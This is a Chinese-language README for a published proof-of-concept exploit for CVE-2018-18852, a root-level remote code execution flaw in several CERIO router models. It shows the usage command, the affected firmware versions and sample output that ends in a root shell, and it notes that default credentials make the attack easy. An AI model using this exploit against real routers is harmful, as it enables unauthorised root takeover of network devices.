hook-s3c (github.com/hook-s3c), @hook_s3c 在Twitter上
针对CVE-2018-18852的有效Python PoC,最初发布在: https://github.com/hook-s3c/CVE-2018-18852
CERIO路由器型号及变体包括DT300N、DT100G、AMR-3204、WMR-200N,存在已认证的基于Web的RCE漏洞,以root用户执行。
该漏洞以0day形式存在且未公开; https://www.fortiguard.com/zeroday/FG-VD-18-149
厂商默认凭据通常存在,因此利用非常容易。
架构为MIPS。
用法:exploit.py <ip地址> <端口> <凭据>
$ python ./exploit.py 127.0.0.1 8080 admin:admin
[*] ================================================
[*] CERIO RCE CVE-2018-18852, 已在以下设备上确认;
[*] - CERIO DT-300N-NGS-M - 固件: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N - 固件: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N - 固件: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G - 固件: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N - 固件: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G - 固件: Cen-AC V2.0.19
[*] - CERIO WMR-200N - 固件: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] 由 hook (@hook_s3c) 编写 https://github.com/hook-s3c/CVE-2018-18852
[/] 致敬 vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob,
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] 去搞一份YTCracker的Introducing Neals,政府越权不是玩笑 - 醒醒吧
[*] ================================================
root@cerio:~# id
[!] 这可能不是正确的型号(DT-300N-NGS-M),正在重试
[+] 成功获取pid令牌: 1312
uid=0(root) gid=0(root)
root@cerio:~#
感谢 vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee 去搞一份YTCracker的Introducing Neals,政府越权不是玩笑 - 醒醒吧
HTP!!!! YEET